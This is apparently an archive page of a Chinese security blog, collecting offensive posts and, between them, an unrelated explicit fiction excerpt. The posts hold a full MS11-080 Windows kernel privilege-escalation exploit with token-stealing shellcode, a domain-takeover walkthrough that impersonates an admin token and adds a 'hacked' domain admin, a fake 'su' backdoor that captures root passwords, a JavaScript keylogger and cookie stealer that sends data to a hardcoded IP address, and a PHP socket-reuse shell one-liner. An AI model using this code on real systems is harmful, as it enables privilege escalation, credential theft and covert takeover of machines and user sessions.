MS11080 Exploit

2012年1月13日 没有评论 200 views

/*
 * MS11-080 Afd.sys Privilege Escalation Exploit
 * Source: Matteo Memelli, http://www.exploit-db.com/exploits/18176/
 * Adapted by: KiDebug, Google@pku.edu.cn
 * Compiler: VC6.0
 * Tested on: stock Windows XP SP3 and Windows 2003 SP2, running as a
 * standard (non-administrator) user.  The code is 32-bit only (pushad,
 * 32-bit pointer arithmetic through ULONG).
 */

#include <stdio.h>

#include <Winsock2.h>

#include <winbase.h>

#include <windows.h>

#pragma comment (lib, "ws2_32.lib")

/* One entry of the SystemModuleInformation (class 11) array returned by
 * NtQuerySystemInformation.  The layout mirrors the kernel's own structure,
 * so field order and sizes must not be changed.  main() reads only
 * ImageBase (used as the kernel load address of ntoskrnl) and
 * FullPathName + OffsetToFileName (the bare file name passed to LoadLibraryA). */
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section; // Not filled in
    PVOID MappedBase;
    PVOID ImageBase;            /* module load address as seen by the kernel */
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;    /* index into FullPathName where the file name starts */
    UCHAR FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

/* Header of the SystemModuleInformation buffer: a count followed by an
 * open-ended array.  It is declared with a single element here because the
 * caller in main() deliberately passes a too-small buffer, expects
 * STATUS_INFO_LENGTH_MISMATCH, and only needs the first (ntoskrnl) entry. */
typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

/* Function-pointer types for the native calls used below; main() resolves
 * each one from ntdll.dll with GetProcAddress at run time. */
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );

NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

/* Kernel-mode addresses, filled in by main() and read by ShellCode():
 * three ntoskrnl exports rebased to the running kernel's load address, plus
 * the address inside HalDispatchTable that the AFD IOCTL overwrites. */
ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

/* Kernel-mode payload.  main() copies its first 100 bytes into a NOP sled in
 * user memory and points the overwritten HalDispatchTable entry at that sled;
 * when the kernel calls through the entry this code runs in ring 0 and copies
 * the System process's token pointer over the current process's token pointer
 * (classic token stealing).  Naked: no prologue/epilogue, so every register
 * and the flags are saved and restored by hand.  32-bit only; it reads the
 * globals that main() must have filled in before the trigger. */
void _declspec(naked) ShellCode()
{
    __asm
    {
        pushad                          // save all general registers and flags
        pushfd
        // Find the EPROCESS->Token offset without hard-coding it: scan the
        // bytes of PsReferencePrimaryToken for the first 0x8D (an LEA opcode)
        // and take the 32-bit displacement that follows as the offset.
        // NOTE(review): this assumes the first 0x8D in that routine is the
        // LEA of the token field; the header says it held on XP SP3 / 2003
        // SP2, nothing is checked here for other builds.
        mov esi,PsReferencePrimaryToken
    FindTokenOffset:
        lodsb
        cmp al, 8Dh;
        jnz FindTokenOffset
        mov edi,[esi+1]                 // edi = token offset inside EPROCESS
        // esi = *PsInitialSystemProcess, the EPROCESS of the System process
        mov esi,PsInitialSystemProcess
        mov esi,[esi]
        // eax = EPROCESS owning the thread at fs:[124h] (presumably the
        // current thread pointer in the KPCR), i.e. this exploit's process
        push fs:[124h]
        mov eax,PsGetThreadProcess
        call eax
        add esi, edi                    // esi = &SystemProcess->Token
        add edi, eax                    // edi = &CurrentProcess->Token
        movsd                           // 4-byte copy: current process now carries the System token
        popfd
        popad
        ret
    }
}

/* Entry point.  Usage: ms11-080.exe <program> <command-line>.
 *
 * Sequence, as published: resolve three Nt* routines from ntdll; map the low
 * address range; locate ntoskrnl and compute the kernel addresses ShellCode
 * needs; place ShellCode in a NOP sled at a fixed user address; use the
 * Afd.sys IOCTL (the MS11-080 bug) as a write primitive against
 * HalDispatchTable; call NtQueryIntervalProfile so the kernel calls through
 * the overwritten entry; then run argv[1] with "/c argv[2]", which the author
 * says now runs as SYSTEM.
 *
 * Every failing step just returns silently (the diagnostic printf calls are
 * commented out), nothing is cleaned up, and nothing verifies that the token
 * swap happened before the child process is started.  Only the 32-bit builds
 * named in the file header were tested. */
void main(int argc, char **argv)
{
    if (argc != 3)
    {
        printf("--------------------------------------\n");
        printf("Usage : ms11-080.exe cmd.exe Command \n");
        exit(-1);
    }

    /* Resolve the native calls by name; ntdll is already mapped in every
     * process, so GetModuleHandle is enough. */
    HMODULE ntdll = GetModuleHandle( "ntdll.dll" );
    NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
    NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
    NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
    if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
        return;

    /* Map 0x1000 bytes starting at address 1 in this process (handle -1 is
     * the current-process pseudo handle).  A base of 1 rather than 0 is what
     * requests the lowest page instead of "anywhere"; the memset/memcpy at
     * 0x1000 below rely on this mapping covering that page -- presumably the
     * region is rounded to 0x0-0x1FFF, but that is not visible here (verify). */
    ULONG BaseAddress = 1 , RegionSize = 0x1000, status;
    status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    if ( status )
        return;

    /* Query the loaded-module list with a one-entry buffer.  The call is
     * expected to fail with STATUS_INFO_LENGTH_MISMATCH, but the first entry
     * (ntoskrnl) is already filled in, and that is all that is needed. */
    ULONG NtoskrnlBase;
    RTL_PROCESS_MODULES module;
    status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
    if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH
        return;
    NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;

    /* Load the kernel image into this process as an ordinary DLL (by bare file
     * name, so whichever ntoskrnl variant is running is what gets loaded) so
     * that its exports can be resolved with GetProcAddress. */
    HMODULE ntoskrnl;
    ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
    if ( ntoskrnl == NULL )
        return;

    /* Rebase each user-mode export address onto the kernel's load address.
     * WriteToHalDispatchTable is HalDispatchTable + 4 (its second entry) + 2;
     * the extra +2 is not explained in this listing and presumably matches
     * how the AFD write below lays its bytes down -- check against the
     * original exploit-db entry before relying on it. */
    WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // address to overwrite
    PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
    PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
    PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

    /* 128 KiB of RWX memory at a fixed address, filled with NOPs, with the
     * first 100 bytes of ShellCode dropped at 0x02080000, the middle of the
     * sled.  The fixed address is what the HalDispatchTable overwrite is
     * meant to land on, so any of the sled addresses slides into ShellCode. */
    if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
        return;
    memset((PVOID)0x02070000,0x90,0x20000);
    memcpy((PVOID)0x02080000,ShellCode,100);

    /* A TCP socket is needed only as a handle that reaches Afd.sys; the
     * connect to 127.0.0.1:4455 is allowed to fail (its result is ignored). */
    WSADATA ws;
    SOCKET tcp_socket;
    struct sockaddr_in peer;
    ULONG dwReturnSize;
    WSAStartup(0x0202,&ws);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(4455);
    peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
    tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
    {
        //printf("connect error\n");
    }

    /* Build the IOCTL input in the low page: 25 bytes of header from buf1
     * at 0x1000, the rest 0x45 filler; the input buffer handed to the driver
     * starts 4 bytes in, at 0x1004, with length 0x108.  The output buffer is
     * the kernel address to overwrite with an output length of 0 -- that is
     * the write primitive (IOCTL 0x000120bb is presumably the AFD request
     * covered by MS11-080).  NOTE(review): the trailing bytes of buf1 as
     * printed here do not obviously encode the 0x02080000 sled address;
     * compare with the exploit-db original before trusting this copy. */
    UCHAR buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
    memset((PVOID)0x1000,0x45,0x108);
    memcpy((PVOID)0x1000,buf1,25);
    if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
    {
        //printf("error=%d\n", GetLastError());
    }

    /* Trigger.  Per the original write-up, NtQueryIntervalProfile calls
     * through the HalDispatchTable entry that was just overwritten, so
     * ShellCode runs in kernel mode and swaps this process's token for the
     * System one.  The return status is not checked. */
    NtQueryIntervalProfile( 2, &status );

    printf("[>] ms11-080 Exploit\n");
    printf("[>] by:Mer4en7y@90sec.org\n");

    /* Run argv[1] with "/c argv[2]", capturing its stdout/stderr through an
     * inheritable pipe.  Defects in this part, as published:
     *  - dwReadBytes is read uninitialized by the while condition;
     *  - hWrite is closed and then written to inside the loop;
     *  - argv[2] is strcat'ed into a 256-byte buffer with no length check;
     *  - CreatePipe / CreateProcess failures are printed but not acted on. */
    SECURITY_ATTRIBUTES sa;
    HANDLE hWrite,hRead;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    char buf[4096];
    DWORD dwReadBytes;
    char lpcmd[256]={0};
    ZeroMemory(buf,4096);
    sa.bInheritHandle = TRUE;
    sa.lpSecurityDescriptor = NULL;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    if(!CreatePipe(&hRead,&hWrite,&sa,0))
    {
        printf("[>] create pipe error\n");
    }
    si.cb = sizeof(STARTUPINFO);
    GetStartupInfo(&si);
    si.hStdError = hWrite;
    si.hStdOutput = hWrite;
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    strcat(lpcmd,"/c ");
    strcat(lpcmd,argv[2]);
    if(!CreateProcess(argv[1],lpcmd,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi))
    {
        printf("[>] create porcess error\n");
    }
    CloseHandle(hWrite);
    while(dwReadBytes!=0)
    {
        WriteFile(hWrite,"test1",6,&dwReadBytes,NULL);
        ZeroMemory(buf,4096);
        ReadFile(hRead,buf,4096,&dwReadBytes,NULL);
        printf("%s\n",buf);
    }
    return;
}


How to attack a windows domain

2012年1月2日 没有评论 161 views

Get administrator rights on a workstation that is joined to a Windows domain, using whatever method you can find (exploit, stolen password, SMB relay, phishing, etc.). Then look for the domain controller. There are a variety of ways to do this: you can run arp -a to find active IPs, or ping-sweep the network and then use the nbtstat tool to look for the domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Acquiring and cracking the password hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHAT\Domain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:\WINDOWS\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Let's say the workstation we hacked is at 172.16.1.10. We now need to find out if there are any access tokens on it that we can use.

c:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[*] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPCLIENT\local_valsmith

Impersonation Tokens Available
==========================================
BLACKHAT\admin_valsmith
NT AUTHORITY\ANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the local administrator's hash and recovered the password. incognito logs on to the IPC$ share on the target, copies in and starts a service, enumerates the tokens held by processes on that host, and then removes the service again (see the output above). That service creation and deletion is an artifact that anyone auditing the workstation can see, so plan for it on an engagement.

Next we will utilize this token to gain domain admin rights:

C:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhat\admin_valsmith" cmd

[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[+] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:\>net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:\>net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The request will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf


SSHscan – Scanning ports through SSH Port Forwarding

2012年1月2日 没有评论 85 views

SSHscan – Scanning ports through SSH Port Forwarding

SSHscan.py lets you scan an internal network through an SSH server that has port forwarding enabled. The tool can create a local port forward on localhost for every open port it detects in the internal network range.

This is not a tool you can use in every engagement, but when you have the opportunity and the need, it will come in handy.

The tool has been included in the edgeSSH kit, where we will collect all our SSH-related scripts; at the moment it contains only bruteSSH, an SSH login brute-forcer, and scanSSH.

You can download the code here: http://code.google.com/p/edgessh

Code:

Command line options:
    -h: target host
    -u: username
    -p: password
    -l: targets list to scan
    -t: threads
    --remote-host: host to scan
    --remote-ports: port list to scan
    --default-ports: scan default ports
    --all-ports: scan all 65535 ports
    --keep-tunnels: forward all open ports

Examples:

Code:

    scanssh.py -h 192.168.1.55 -u root -p password -l list.txt
    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443
    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports

[source: http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html]


目录Authorization破解工具

2012年1月2日 没有评论 141 views

来自:http://www.007hack.com/?p=635

Web目录下有一些文件不允许匿名访问(可以使用Tomcat、Apache、nginx等进行配置,来实现此效果),如下图:

可以使用以下代码+字典破解,运行结果如下:

主要代码如下(附件中有完整代码,仅供学习!请勿非法使用!):

点击下载:Crack_pass.rar


悸动的灵魂 兄弟的情深

2011年12月17日 1 条评论 283 views

"喂,我明天去堕胎。”
“嗯。”
“不要你陪我。”
“不会,别打扰我。”
挂了电话,耳边仍然回荡着苏枂充满诱惑力的声音,我看了看手机,已经11点了。明天苏枂就去堕胎了,而今晚的我却和别的女人在一起。昏暗的灯光,迷人的香水,光滑的皮肤,还有充满力量的撞击。直到我倾泻而出,我忽然想到,明天苏枂真的要去堕胎了,而她肚子里的孩子,是我的。

苏枂是个BIAO子,认识她的每一个人都知道这一点。第一次见苏枂是在一次朋友聚会中,当苏枂穿着一身粉红色的运动装推门而入的时候,我的眼睛都看直了。兄弟鸭子悄悄捅了捅我,在我耳边低声说道:“别看了,那是个BIAO子,外表看着单纯,实际上只要给钱,什么都做。”我无法形容当时我心里的巨大落差,这么清纯漂亮的女孩居然是个BIAO子,看来女人真的不能光从外表判断,如果鸭子不说,我还以为苏枂是个纯情的CN。我问鸭子:“你上过她么?”鸭子说:“当然没有,我从来没有花钱艹B的习惯。其实那个BIAO子不是那种洗头房里的BIAO子,她今年大三,是那种楼FENG一样的女人,你需要了,联系她,给她钱,然后她就来满足你。”我说:“你怎么知道的这么清楚?”鸭子说:“她的好朋友是我以前的女人。”

我看着苏枂,她走到桌前坐下,然后和我的一个朋友打招呼。苏枂笑起来很美,牙齿很白,嘴唇很红,苏枂笑起来眼睛会弯成好看的弧度,长长地睫毛,还有胸前那若有若无的沟。我点了根烟,感叹道:“这么美的女人,居然是一个BIAO子。”

吃饭的时候,我们挨个碰杯,碰到苏枂时,我说:“美女,看你好眼熟,好像在哪见过你,来,交个朋友。”苏枂脸红了,在我眼里这却是故作害羞。和我喝了酒之后,在接下来的时间里,苏枂不时的偷偷看我。我知道她心里怎么想的,她肯定以为我是以前花钱CAO过她的男人中的一个,而她现在记不起来了。我笑了笑,看着她。她立马低下头。“BIAO子。”我在心里这样说道。
阅读全文...


PHP端口复用的利用

2011年12月3日 没有评论 230 views
来自:wofeiwo
如果还有人记得我当年发在80sec上的那篇《Linux 系统文件描述符继承带来的危害》的话,应该记得当时这个问题已经被apache官方使用FD_CLOEXEC修复了:由于在系统底层exec其他进程的时候,所有带有该标志的FD都会被自动关闭,因此就没有办法使用system等php函数,在子进程如bash中继续操作原有开启的高权限文件描述符。
但是最近PHP 5.3.6引进了一个新特性:利用fopen("php://fd/fd_number", "w")的形式,可以直接打开并操作当前进程的文件描述符。基本相当于一个fdopen函数调用。

结合这两点,由于php本身的一种运行方式是以apache的mod方式在apache进程中存在的,所以对于php来说,他的自身进程也就是apache的进程,所有apache原来在root下打开的文件描述符,他都能操作。于是乎,原有修补完毕的漏洞,经过PHP新功能的妙手回春,又重现江湖了。

那么究竟如何利用这个漏洞呢?在之前的那篇文章里, 我曾经给出了一个例子,就是直接复用当前连接80端口的socket,生成一个交互性shell。当时我没有给出自动化查找当前连接80端口socket 的实现,但实际上,在写文章的时候,我就私底下给出过一个利用shell工具自动化查找当前socket连接的方法:

// Reuse the socket of the current HTTP client as an interactive shell.
// Step 1: `netstat -ane` lines containing REMOTE_ADDR in ESTABLISHED state;
//   column 8 is, per the text below, the socket (inode) number -- so `$ip`
//   actually holds an inode, not an address.
// Step 2: `ls -alh /proc/self/fd` entries whose link target contains that
//   number; column 9 is the fd number.
// Step 3: spawn bash on a pty with stdin/stdout/stderr redirected to that fd.
// NOTE(review): the awk column numbers depend on the host's exact netstat/ls
// output format, and the inner double quotes around /bin/bash must be escaped
// (\") inside this PHP double-quoted string -- the listing as printed has
// lost that escaping.  The article itself notes this child-process variant
// no longer works once Apache marks its descriptors FD_CLOEXEC.
system("ip=`netstat -ane | grep ${_SERVER['REMOTE_ADDR']} | grep ESTABLISHED | awk '{print $8}'`;socket=`ls -alh /proc/self/fd | grep $ip |awk '{print $9}'`; python -c 'import pty;pty.spawn("/bin/bash")' 1>&$socket 0>&$socket 2>&$socket");

解读一下上面的伪 PHP shell 代码:通过比对netstat -ane(e参数的作用是输出socket号)的输出和/proc/self/fd(当前进程的文件描述符信息)的内容,找到相匹配的socket号,那就是当前连接的socket了,然后立刻重用之。很简单吧?

但当时的例子已经不能在apache补丁后使用了,因为他用到了子进程再重定向输入输出来实现端口复用。而现在由于不能使用子进程来做这些事情,因此所有难点就集中在如何自动化的查找当前连接的socket上。

仔细看上面那些代码的原理,不过是使用netstat来进行当前系统中socket信息的输出比对。既然如此,我只要手工实现netstat的功能即可。那netstat又是如何实现的呢?
阅读全文...


php open_basedir设置以及关于安全

2011年12月3日 没有评论 105 views

open_basedir可将用户访问文件的活动范围限制在指定的区域,通常是其家目录的路径,也可用符号"."来代表当前目录。注意用open_basedir指定的限制实际上是前缀,而不是目录名。
举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。
open_basedir也可以同时设置多个目录,在Windows中用分号分隔目录,在任何其它系统中用冒号分隔目录。当其作用于Apache模块时,父目录中的open_basedir路径自动被继承。

Apache+PHP配置方法有三种:
方法一:在php.ini里配置
open_basedir = .:/tmp/

方法二:在Apache配置的VirtualHost里设置(httpd-vhosts.conf)
php_admin_value open_basedir .:/tmp/

方法三:在Apache配置的Directory里设置
php_admin_value open_basedir .:/tmp/

阅读全文...


最小化安装CentOS6 VMware-tools安装几点注意事项

2011年11月25日 没有评论 227 views

#./vmware-install.pl
bash:./vmware-install.pl :/usr/bin/perl:bad interpreter:No such file or directory.
如果出现这个提示,则表明系统没有安装Perl环境,可以使用如下命令来提供Perl支持:
#yum groupinstall "Perl Support"

Searching for GCC...
The path "" is not valid path to the gcc binary.
Would you like to change it? [yes]
如果出现这个就表明gcc没有安装

yum install gcc gcc-c++ automake make
将编译环境一次装好
阅读全文...


linux Backdoor

2011年11月24日 没有评论 229 views

/*

* kpr-fakesu.c V0.9beta167

* by koper

*

* Setting up:

* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c

* admin@host:~$ mv .su /var/tmp/.su

* admin@host:~$ cp .bash_profile .wgetrc

* admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile

* admin@host:~$ logout

* *** LOGIN ***

* admin@host:~$ su

* Password:

* su: Authentication failure

* Sorry.

* admin@host:~$ su

* Password:

* root@host:~# logout

* admin@host:~$ cat /var/tmp/.pwds

* root:dupcia17

* admin@host:~$

*

* /bin/su sends various failure information depending on the OS ver.

* Please modify the source to make it "fit" ;)

*

*/

/* NOTE(review): the header names were lost when this listing was published
 * (three bare #include lines).  These are the standard headers the code
 * below uses: stdio for FILE/fopen/fprintf/sprintf, stdlib for system,
 * string for strcmp, unistd for getpass. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Fake `su` that captures the password typed into it.  The header above
 * describes the deployment: an `alias su=/var/tmp/.su` appended to the
 * victim's .bash_profile makes the next `su` run this binary once.
 *
 * Flow: pick the target user from argv (default root; `-l USER` honoured),
 * prompt for a password without echo, wait 3 seconds, print an
 * authentication failure, log "user:password" to /var/tmp/.pwds, restore the
 * victim's .bash_profile from the .wgetrc copy, delete itself, and leave a
 * symlink to /bin/su in its place so the victim's second attempt is genuine.
 *
 * Defects as published (this listing appears to have lost its backslashes):
 *  - the prompt is "assword: " and both messages end in a literal "n" where
 *    "\n" was clearly intended -- compare with the real su on the target,
 *    as the header itself advises;
 *  - the cleanup string hard-codes /home/test although the header's setup
 *    runs as "admin"; for any other home the profile is never restored;
 *  - /var/tmp/.pwds is opened with "w", so each run overwrites the previous
 *    capture;
 *  - implicit `int` return type and no return value (pre-C99 style).
 * Artifacts a defender can look for: an `alias su=` line in a shell profile,
 * a .wgetrc that is really a profile copy, /var/tmp/.su and /var/tmp/.pwds. */
main(int argc, char *argv[]){
    FILE *fp;
    char *user;
    char *pass;
    char filex[100];
    char clean[100];
    sprintf(filex,"/var/tmp/.pwds");                           /* capture file */
    sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");
    if(argc==1) user="root";                                   /* plain `su` */
    if(argc==2) user=argv[1];                                  /* `su USER` */
    if(argc>2){
        if(strcmp(argv[1], "-l")==0)
            user=argv[2];                                      /* `su -l USER` */
        else user=argv[1];}
    fprintf(stdout,"assword: ");
    pass=getpass ("");                                         /* read without echo */
    system("sleep 3");                                         /* presumably mimics su's failure delay */
    fprintf(stdout,"su: Authentication failurenSorry.n");
    if ((fp=fopen(filex,"w")) != NULL)
    {
        fprintf(fp, "%s:%sn", user, pass);
        fclose(fp);
    }
    system(clean);                                             /* remove self, restore the profile */
    system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su"); /* the alias now reaches the real su */
}

以下三个都是比较经典的backdoor:

阅读全文...


几个在线密码破解网站的比较

2011年11月24日 1 条评论 405 views

国内:www.cmd5.com(收费,国内最强大的)

国内:http://www.md5.com.cn/ (有特色,还没怎么用)

国内:www.xmd5.com(还不错)

国外:http://www.c0llision.net/webcrack.php(免费,还不错)

国外:http://hashkiller.com/ (免费,相当强大!!!)

国外:http://ops.conus.info/(免费,少有的oracle hash在线破解网站)

以上几个网站在我使用过程当中查询md5我感觉hashkiller和cmd5最强大,其实cmd5更强些,但是hashkiller是完全免费 的!所以hashkiller=cmd5>xmd5>collision,从测试来看,就md5和md5+salt来说,cmd5.com后 台破解比它的查询强大。

值得一提的是,很多只能靠cmd5.com后台破的md5密码能靠hashkiller网站直接查出来,只有少部分密码不行。可以先用hashkiller和collision查询,再用cmd5和xmd5查询,然后再考虑使用cmd5后台破解功能,如果还破不出来那可能就真的破不出来了。其实这五个网站也是一种检验自己密码强度的最佳方法,看看自己的密码是否在这数万亿的字典当中。另外需要补充的是,collision支持批量查询:)需要注意的是,提交到这些在线站点的哈希以及查出的明文都会留在第三方手里,属于客户或授权范围内的数据不宜直接提交。


键盘记录js代码

2011年11月24日 没有评论 222 views

// XSS keylogger / cookie-stealer payload.  Everything captured is beaconed to
// `hacker` as GET query strings via Image().src; no response is read and the
// values are not URL-encoded, so a typed `&`, `#` or `+` corrupts the query.
var keys=''; // accumulated key and mouse-button log, flushed every 5 s
var hacker = 'http://218.6.132.15:8080/xss.php'; // collection endpoint
var Url = window.location;    // assigned but never sent
var Domain = document.domain; // assigned but never sent
var Cookie = document.cookie; // last cookie value seen

// Key handler.  NOTE(review): only the default branch appends to `keys`;
// the Space/Enter/BackSpace labels are computed and then discarded by the
// `break`, so those keys never reach the log.  `get` and `key` are implicit
// globals (no `var`).
document.onkeypress = function(e) {
    get = window.event ? event:e;                    // IE vs. W3C event object
    key = get.keyCode ? get.keyCode : get.charCode;
    switch(key){
        case 32 : key = '[Space]';break;
        case 13 : key = '[Enter]';break;
        case 8 : key = '[BackSpace]';break;
        default :
            key = String.fromCharCode(key);
            keys += key;
    }
}

// Cookie beacon: every 2 s send document.cookie as ?m=c&c=...  The comparison
// with the previous value only refreshes `Cookie`; the send itself is
// unconditional (the original comment claimed it sent only on change).
window.onload = function(){
    setInterval(function(){
        var Cookie_t = document.cookie;
        if(Cookie_t != Cookie){
            Cookie = Cookie_t;
        }
        SendData(hacker + '?m=c&c=' + Cookie);
    },2000);
}

// Mouse-button handler.  The 1 / 2 / 4 codes follow the legacy IE
// `event.button` scheme (left / right / middle); other browsers number the
// buttons differently -- TODO confirm against the target browsers.
document.onmousedown = function(e) {
    get = window.event ? event : e;
    var mousekey = get.button;
    switch(mousekey) {
        case 1 :
            mousekey = '[Left Mouse Clik]';break;
        case 2 :
            mousekey = '[Right Mouse Clik]';break;
        case 4 :
            mousekey = '[Roll Mouse Clik]';break;
        default :
            mousekey = '[Unknown Mouse Key]';
    }
    keys += mousekey;
}

// Fire-and-forget GET: the Image is never attached to the document.
function SendData(src){
    new Image().src = src;
}

// Key beacon: every 5 s send the buffered keys as ?m=k&c=... and reset them.
setInterval(function(){ SendData(hacker + '?m=k&c=' + keys);keys = ''; },5000);


nmap的漏洞插件

2011年11月24日 没有评论 210 views

官方说明:http://nmap.org/nsedoc/

选了些自我感觉特别实用的:

ms-sql-brute

nmap -sV --script=ms-sql-brute <target>

ms-sql-xp-cmdshell

Example Usage:

nmap -sV --script=ms-sql-xp-cmdshell <target>
Script Output

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| mssql-xp-cmdshell:
|   Command: ipconfig /all; User: sa
|   output
|
|   Windows IP Configuration
|
|      Host Name . . . . . . . . . . . . : EDUSRV011
|      Primary Dns Suffix  . . . . . . . : cqure.net
|      Node Type . . . . . . . . . . . . : Unknown
|      IP Routing Enabled. . . . . . . . : No
|      WINS Proxy Enabled. . . . . . . . : No
|      DNS Suffix Search List. . . . . . : cqure.net
|
|   Ethernet adapter Local Area Connection 3:
|
|      Connection-specific DNS Suffix  . :
|      Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2
